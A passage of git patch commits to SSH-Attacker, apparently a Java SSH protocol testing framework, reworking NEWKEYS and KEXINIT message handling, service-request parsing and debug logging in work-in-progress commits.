de.rub.nds.sshattacker.core.protocol.transport.message.HybridKeyExchangeInitMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; @@ -194,6 +192,8 @@ private void processMessage( // message.getHandler(context).updateDigest(message, true); if (message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() + || message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_HBR_REPLY.getValue() || message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { @@ -204,6 +204,29 @@ private void processMessage( message.getCompleteResultingMessage().getValue()[0]); } + if (message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue()) { + ProtocolMessageHandler handler = message.getHandler(context); + if (handler instanceof MessageSentHandler) { + ((MessageSentHandler) handler).adjustContextAfterMessageSent(); + } + } else { + LOGGER.info( + "[bro] Adjusting Context while messagetype is {}", + message.getCompleteResultingMessage().getValue()[0]); + } + + if (message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() + || message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { + message.getHandler(context).adjustContextAfterMessageSent(message); + } else { + LOGGER.info( + "[bro] Adjusting Context while messagetype is {}", + message.getCompleteResultingMessage().getValue()[0]); + } + if (message.getAdjustContext()) { message.getHandler(context).adjustContext(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 4cd788f52..cafb4c862 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -441,6 +441,9 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { case SSH_MSG_HBR_INIT: LOGGER.debug("[bro] returning SSH_MSG_HBR_INIT Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_INIT); + case SSH_MSG_NEWKEYS: + LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS); default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java index 68d489778..9acdc60e3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java @@ -28,6 +28,7 @@ public ProtocolMessageHandler(SshContext sshContext) { // Kann von den detaillierten Handlern überschrieben werden. public void adjustContextAfterSerialize(MessageT message) {} + public void adjustContextAfterMessageSent(MessageT messageT) {} /* public ProtocolMessageHandler(SshContext context, T message) { this.context = context; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java index 19b30d039..e2773e144 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java @@ -25,6 +25,104 @@ public KeyExchangeInitMessageHandler(SshContext context) { super(context, message); }*/ + public void adjustContextAfterMessageSent(KeyExchangeInitMessage message) { + if (sshContext.isHandleAsClient()) { + sshContext.setServerCookie(message.getCookie().getValue()); + sshContext.setServerSupportedKeyExchangeAlgorithms( + Converter.nameListToEnumValues( + message.getKeyExchangeAlgorithms().getValue(), + KeyExchangeAlgorithm.class)); + sshContext.setServerSupportedHostKeyAlgorithms( + Converter.nameListToEnumValues( + message.getServerHostKeyAlgorithms().getValue(), + PublicKeyAlgorithm.class)); + sshContext.setServerSupportedEncryptionAlgorithmsClientToServer( + Converter.nameListToEnumValues( + message.getEncryptionAlgorithmsClientToServer().getValue(), + EncryptionAlgorithm.class)); + sshContext.setServerSupportedEncryptionAlgorithmsServerToClient( + Converter.nameListToEnumValues( + message.getEncryptionAlgorithmsServerToClient().getValue(), + EncryptionAlgorithm.class)); + sshContext.setServerSupportedMacAlgorithmsClientToServer( + Converter.nameListToEnumValues( + message.getMacAlgorithmsClientToServer().getValue(), + MacAlgorithm.class)); + sshContext.setServerSupportedMacAlgorithmsServerToClient( + Converter.nameListToEnumValues( + message.getMacAlgorithmsServerToClient().getValue(), + MacAlgorithm.class)); + sshContext.setServerSupportedCompressionMethodsClientToServer( + Converter.nameListToEnumValues( + message.getCompressionMethodsClientToServer().getValue(), + CompressionMethod.class)); + sshContext.setServerSupportedCompressionMethodsServerToClient( + Converter.nameListToEnumValues( + message.getCompressionMethodsServerToClient().getValue(), + CompressionMethod.class)); + sshContext.setServerSupportedLanguagesClientToServer( + Arrays.asList( + message.getLanguagesClientToServer() + .getValue() + .split("" + CharConstants.ALGORITHM_SEPARATOR))); + sshContext.setServerSupportedLanguagesServerToClient( + Arrays.asList( + message.getLanguagesServerToClient() + .getValue() + .split("" + CharConstants.ALGORITHM_SEPARATOR))); + sshContext.setServerReserved(message.getReserved().getValue()); + + sshContext.getExchangeHashInputHolder().setServerKeyExchangeInit(message); + } else { + sshContext.setClientCookie(message.getCookie().getValue()); + sshContext.setClientSupportedKeyExchangeAlgorithms( + Converter.nameListToEnumValues( + message.getKeyExchangeAlgorithms().getValue(), + KeyExchangeAlgorithm.class)); + sshContext.setClientSupportedHostKeyAlgorithms( + Converter.nameListToEnumValues( + message.getServerHostKeyAlgorithms().getValue(), + PublicKeyAlgorithm.class)); + sshContext.setClientSupportedEncryptionAlgorithmsClientToServer( + Converter.nameListToEnumValues( + message.getEncryptionAlgorithmsClientToServer().getValue(), + EncryptionAlgorithm.class)); + sshContext.setClientSupportedEncryptionAlgorithmsServerToClient( + Converter.nameListToEnumValues( + message.getEncryptionAlgorithmsServerToClient().getValue(), + EncryptionAlgorithm.class)); + sshContext.setClientSupportedMacAlgorithmsClientToServer( + Converter.nameListToEnumValues( + message.getMacAlgorithmsClientToServer().getValue(), + MacAlgorithm.class)); + sshContext.setClientSupportedMacAlgorithmsServerToClient( + Converter.nameListToEnumValues( + message.getMacAlgorithmsServerToClient().getValue(), + MacAlgorithm.class)); + sshContext.setClientSupportedCompressionMethodsClientToServer( + Converter.nameListToEnumValues( + message.getCompressionMethodsClientToServer().getValue(), + CompressionMethod.class)); + sshContext.setClientSupportedCompressionMethodsServerToClient( + Converter.nameListToEnumValues( + message.getCompressionMethodsServerToClient().getValue(), + CompressionMethod.class)); + sshContext.setClientSupportedLanguagesClientToServer( + Arrays.asList( + message.getLanguagesClientToServer() + .getValue() + .split("" + CharConstants.ALGORITHM_SEPARATOR))); + sshContext.setClientSupportedLanguagesServerToClient( + Arrays.asList( + message.getLanguagesServerToClient() + .getValue() + .split("" + CharConstants.ALGORITHM_SEPARATOR))); + sshContext.setClientReserved(message.getReserved().getValue()); + + sshContext.getExchangeHashInputHolder().setClientKeyExchangeInit(message); + } + } + @Override public void adjustContext(KeyExchangeInitMessage message) { if (sshContext.isHandleAsClient()) { From 44eb8365add0b4a7c78d8213ec14ff39562beab1 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 2 Jul 2023 22:47:02 +0200 Subject: [PATCH 024/176] wip: new Keys works --- .../core/layer/impl/SSH2Layer.java | 13 +++++-- .../core/layer/impl/TransportLayer.java | 38 ++++++++++++++----- .../parser/NewKeysMessageParser.java | 5 ++- 3 files changed, 41 insertions(+), 15 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 36a17d932..3422f7635 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -34,10 +34,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import de.rub.nds.sshattacker.core.protocol.transport.message.HybridKeyExchangeInitMessage; -import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; -import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; -import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.*; import java.io.ByteArrayOutputStream; import java.io.IOException; import org.apache.logging.log4j.LogManager; @@ -386,12 +383,20 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_HBR_INIT: readHbrInitProtocolData(); break; + case SSH_MSG_NEWKEYS: + readNewKeysProtocolData(); + break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); break; } } + private void readNewKeysProtocolData() { + NewKeysMessage message = new NewKeysMessage(); + readDataContainer(message, context); + } + private void readAuthenticationProtocolData() { AuthenticationMessage message = new AuthenticationMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index cafb4c862..5b4e6f144 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -375,11 +375,21 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException currentInputStream.setHint(currentHint); } // currentInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); - currentInputStream.extendStream( - Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), - 1, - packet.getCleanProtocolMessageBytes().getValue().length)); + // TODO: [bro] here is the error, 1 till 1 is null ! + if (packet.getCleanProtocolMessageBytes().getValue().length == 1) { + currentInputStream.extendStream( + Arrays.copyOfRange( + packet.getCleanProtocolMessageBytes().getValue(), + 0, + packet.getCleanProtocolMessageBytes().getValue().length)); + } else { + currentInputStream.extendStream( + Arrays.copyOfRange( + packet.getCleanProtocolMessageBytes().getValue(), + 1, + packet.getCleanProtocolMessageBytes().getValue().length)); + } + } else { if (nextInputStream == null) { // only set new input stream if necessary, extend current stream otherwise @@ -388,11 +398,19 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException nextInputStream.setHint(currentHint); } // nextInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); - nextInputStream.extendStream( - Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), - 1, - packet.getCleanProtocolMessageBytes().getValue().length)); + if (packet.getCleanProtocolMessageBytes().getValue().length == 1) { + nextInputStream.extendStream( + Arrays.copyOfRange( + packet.getCleanProtocolMessageBytes().getValue(), + 1, + packet.getCleanProtocolMessageBytes().getValue().length)); + } else { + nextInputStream.extendStream( + Arrays.copyOfRange( + packet.getCleanProtocolMessageBytes().getValue(), + 1, + packet.getCleanProtocolMessageBytes().getValue().length)); + } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java index ac749498e..1f3e4dd6d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java @@ -34,7 +34,10 @@ public NewKeysMessage createMessage() { */ @Override - protected void parseMessageSpecificContents(NewKeysMessage message) {} + protected void parseMessageSpecificContents(NewKeysMessage message) { + // does nothing, only used to take the one byte out of the stream + parseByteString(1); + } @Override public void parse(NewKeysMessage message) { From db8cf70ee740d5a2d67e2817ec2ad568c0f63993 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 2 Jul 2023 22:49:33 +0200 Subject: [PATCH 025/176] wip: new Keys works -> cleanup --- .../de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 5b4e6f144..f74f69845 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -375,7 +375,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException currentInputStream.setHint(currentHint); } // currentInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); - // TODO: [bro] here is the error, 1 till 1 is null ! + // if only one byte is to transmit - transmit it alone if (packet.getCleanProtocolMessageBytes().getValue().length == 1) { currentInputStream.extendStream( Arrays.copyOfRange( From c0d76360cc4a82f9c8014728d2c352600a6f47f0 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 3 Jul 2023 01:55:12 +0200 Subject: [PATCH 026/176] wip: hacky but one handshake inkl. service accept is working now -> next steps: clean up and test the other cases. Additionaly: the normale client is not accepting the the handshake because of a "incorrect signature"; need further investigation --- .../core/layer/impl/SSH2Layer.java | 43 ++++++++++++++----- .../core/layer/impl/TransportLayer.java | 8 +++- .../sshattacker/core/packet/BinaryPacket.java | 5 ++- .../ServiceAcceptMessageSerializer.java | 3 +- 4 files changed, 46 insertions(+), 13 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 3422f7635..dd786f04c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -136,6 +136,18 @@ public LayerProcessingResult sendConfiguration() throws IOException { processMessage(message, collectedMessageStream); addProducedContainer(message); flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); + + if (message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue()) { + ProtocolMessageHandler handler = message.getHandler(context); + if (handler instanceof MessageSentHandler) { + ((MessageSentHandler) handler).adjustContextAfterMessageSent(); + } + } else { + LOGGER.info( + "[bro] Adjusting Context while messagetype is {}", + message.getCompleteResultingMessage().getValue()[0]); + } } } @@ -185,6 +197,8 @@ private void processMessage( byte[] serializedMessage = serializer.serialize(); message.setCompleteResultingMessage(serializedMessage); + collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); + // Wird nicht benötigt, da wir keinen "Gesamt"-Digest benötigen ? // message.getHandler(context).updateDigest(message, true); @@ -201,7 +215,16 @@ private void processMessage( message.getCompleteResultingMessage().getValue()[0]); } - if (message.getCompleteResultingMessage().getValue()[0] + if (message.getAdjustContext()) { + message.getHandler(context).adjustContext(message); + } + + // Unklar für SSHv2, erstmal ignoriert + /*if (mustFlushCollectedMessagesImmediately(message)) { + flushCollectedMessages(message.getProtocolMessageType(), collectedMessageStream); + }*/ + + /* if (message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue()) { ProtocolMessageHandler handler = message.getHandler(context); if (handler instanceof MessageSentHandler) { @@ -211,7 +234,7 @@ private void processMessage( LOGGER.info( "[bro] Adjusting Context while messagetype is {}", message.getCompleteResultingMessage().getValue()[0]); - } + }*/ if (message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() @@ -224,14 +247,6 @@ private void processMessage( message.getCompleteResultingMessage().getValue()[0]); } - if (message.getAdjustContext()) { - message.getHandler(context).adjustContext(message); - } - collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); - // Unklar für SSHv2, erstmal ignoriert - /*if (mustFlushCollectedMessagesImmediately(message)) { - flushCollectedMessages(message.getProtocolMessageType(), collectedMessageStream); - }*/ if (message.getAdjustContext()) { message.getHandler(context).adjustContextAfterSerialize(message); } @@ -386,12 +401,20 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_NEWKEYS: readNewKeysProtocolData(); break; + case SSH_MSG_SERVICE_REQUEST: + readServiceRequestData(); + break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); break; } } + private void readServiceRequestData() { + ServiceRequestMessage message = new ServiceRequestMessage(); + readDataContainer(message, context); + } + private void readNewKeysProtocolData() { NewKeysMessage message = new NewKeysMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index f74f69845..845eb72e5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -334,7 +334,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException parser = new BinaryPacketParser( dataStream, - context.getActiveDecryptCipher(), + context.getPacketLayer().getDecryptorCipher(), context.getReadSequenceNumber()); packet = new BinaryPacket(); } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { @@ -462,6 +462,12 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { case SSH_MSG_NEWKEYS: LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS); + case SSH_MSG_SERVICE_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_REQUEST); + /* case SSH_MSG_NEWKEYS: + LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS);*/ default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java index 47d445f1c..4eee52a19 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java @@ -190,7 +190,10 @@ public BinaryPacketParser getParser(SshContext context, InputStream stream) { @Override public BinaryPacketPreparator getPreparator(SshContext context) { return new BinaryPacketPreparator( - context.getChooser(), this, context.getEncryptor(), context.getCompressor()); + context.getChooser(), + this, + context.getPacketLayer().getEncryptor(), + context.getCompressor()); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java index d2ee30adc..ac97f6fa2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java @@ -39,7 +39,8 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + // serializeMessageSpecificContents(); + super.serializeProtocolMessageContents(); return getAlreadySerialized(); } } From 861daf511b5f38eab9d765a9ff50cb33f64d9e48 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Wed, 5 Jul 2023 21:52:44 +0200 Subject: [PATCH 027/176] wip: Simple SSH-Connect Workflow works as expected now --- .../core/crypto/hash/ExchangeHash.java | 1 + .../crypto/hash/ExchangeHashInputHolder.java | 6 ++++++ .../sshattacker/core/layer/impl/SSH2Layer.java | 2 +- .../core/layer/impl/TransportLayer.java | 6 +++--- .../sshattacker/core/packet/BinaryPacket.java | 5 +++++ .../cipher/PacketChaCha20Poly1305Cipher.java | 1 - .../core/protocol/common/SshMessageParser.java | 15 ++++++++------- .../handler/KeyExchangeInitMessageHandler.java | 7 +++++-- .../HybridKeyExchangeInitMessageParser.java | 2 +- .../parser/KeyExchangeInitMessageParser.java | 2 +- .../transport/parser/NewKeysMessageParser.java | 4 ++-- .../parser/ServiceAcceptMessageParser.java | 2 +- .../parser/ServiceRequestMessageParser.java | 2 +- .../KeyExchangeInitMessagePreparator.java | 16 ++++++++-------- 14 files changed, 43 insertions(+), 28 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHash.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHash.java index 927238d10..967f2f47e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHash.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHash.java @@ -212,6 +212,7 @@ private static byte[] prepareCommonPrefixHashInput(ExchangeHashInputHolder input PublicKeyHelper.encode(inputHolder.getServerHostKey().get()))); // Restore the old log level Configurator.setLevel(KeyExchangeInitMessageSerializer.class.getName(), oldLevel); + LOGGER.debug("[bro - hash,prefix] {}", ArrayConverter.bytesToHexString(prefix)); return prefix; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHashInputHolder.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHashInputHolder.java index 65c422376..340ad3bab 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHashInputHolder.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHashInputHolder.java @@ -13,10 +13,14 @@ import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; import java.math.BigInteger; import java.util.Optional; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; /** A holder class to store all required values for exchange hash computation. */ public final class ExchangeHashInputHolder { + protected static final Logger LOGGER = LogManager.getLogger(); + // region General exchange hash fields private VersionExchangeMessage clientVersion; private VersionExchangeMessage serverVersion; @@ -78,6 +82,7 @@ public Optional getClientKeyExchangeInit() { public void setClientKeyExchangeInit(KeyExchangeInitMessage clientKeyExchangeInit) { this.clientKeyExchangeInit = clientKeyExchangeInit; + LOGGER.info("Client_Coookie in holder is: {}", this.clientKeyExchangeInit.getCookie()); } public Optional getServerKeyExchangeInit() { @@ -86,6 +91,7 @@ public Optional getServerKeyExchangeInit() { public void setServerKeyExchangeInit(KeyExchangeInitMessage serverKeyExchangeInit) { this.serverKeyExchangeInit = serverKeyExchangeInit; + LOGGER.info("Server_Coookie in holder is: {}", this.serverKeyExchangeInit.getCookie()); } public Optional> getServerHostKey() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index dd786f04c..cd2826391 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -216,7 +216,7 @@ private void processMessage( } if (message.getAdjustContext()) { - message.getHandler(context).adjustContext(message); + // message.getHandler(context).adjustContext(message); } // Unklar für SSHv2, erstmal ignoriert diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 845eb72e5..a941c5d0a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -386,7 +386,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException currentInputStream.extendStream( Arrays.copyOfRange( packet.getCleanProtocolMessageBytes().getValue(), - 1, + 0, packet.getCleanProtocolMessageBytes().getValue().length)); } @@ -402,13 +402,13 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException nextInputStream.extendStream( Arrays.copyOfRange( packet.getCleanProtocolMessageBytes().getValue(), - 1, + 0, packet.getCleanProtocolMessageBytes().getValue().length)); } else { nextInputStream.extendStream( Arrays.copyOfRange( packet.getCleanProtocolMessageBytes().getValue(), - 1, + 0, packet.getCleanProtocolMessageBytes().getValue().length)); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java index 4eee52a19..0bca48c9d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java @@ -22,10 +22,14 @@ import java.io.InputStream; import java.util.List; import java.util.Objects; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public class BinaryPacket extends AbstractPacket implements DataContainer { + private static final Logger LOGGER = LogManager.getLogger(); + /** * The length of the packet in bytes, not including 'mac' or the 'packet_length' field itself. */ @@ -147,6 +151,7 @@ public void setComputations(PacketCryptoComputations computations) { @Override public void prepareComputations() { + LOGGER.info("[bro] Preparing Computation"); if (computations == null) { computations = new PacketCryptoComputations(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java index 75a3682dd..619e46bec 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java @@ -69,7 +69,6 @@ public PacketChaCha20Poly1305Cipher(SshContext context, KeySet keySet, CipherMod @Override protected void encrypt(BinaryPacket packet) throws CryptoException { if (packet.getComputations() == null) { - LOGGER.warn("Packet computations are not prepared."); packet.prepareComputations(); } PacketCryptoComputations computations = packet.getComputations(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java index 43ee2a0c4..5057fa569 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.protocol.common; +import de.rub.nds.sshattacker.core.constants.SshMessageConstants; import java.io.InputStream; public abstract class SshMessageParser> extends ProtocolMessageParser { @@ -23,15 +24,15 @@ public SshMessageParser(InputStream stream) { super(stream); } - /* @Override - protected final void parseProtocolMessageContents() { - parseMessageID(); - parseMessageSpecificContents(); - }*/ + /*@Override*/ + protected final void parseProtocolMessageContents(T message) { + parseMessageID(message); + parseMessageSpecificContents(message); + } - /* private void parseMessageID() { + private void parseMessageID(T message) { message.setMessageId(parseByteField(SshMessageConstants.MESSAGE_ID_LENGTH)); - }*/ + } protected abstract void parseMessageSpecificContents(T message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java index e2773e144..7aa4db437 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java @@ -72,7 +72,7 @@ public void adjustContextAfterMessageSent(KeyExchangeInitMessage message) { .split("" + CharConstants.ALGORITHM_SEPARATOR))); sshContext.setServerReserved(message.getReserved().getValue()); - sshContext.getExchangeHashInputHolder().setServerKeyExchangeInit(message); + sshContext.getExchangeHashInputHolder().setClientKeyExchangeInit(message); } else { sshContext.setClientCookie(message.getCookie().getValue()); sshContext.setClientSupportedKeyExchangeAlgorithms( @@ -119,13 +119,14 @@ public void adjustContextAfterMessageSent(KeyExchangeInitMessage message) { .split("" + CharConstants.ALGORITHM_SEPARATOR))); sshContext.setClientReserved(message.getReserved().getValue()); - sshContext.getExchangeHashInputHolder().setClientKeyExchangeInit(message); + sshContext.getExchangeHashInputHolder().setServerKeyExchangeInit(message); } } @Override public void adjustContext(KeyExchangeInitMessage message) { if (sshContext.isHandleAsClient()) { + LOGGER.info("Server_Coookie is: {}", message.getCookie().getValue()); sshContext.setServerCookie(message.getCookie().getValue()); sshContext.setServerSupportedKeyExchangeAlgorithms( Converter.nameListToEnumValues( @@ -173,6 +174,8 @@ public void 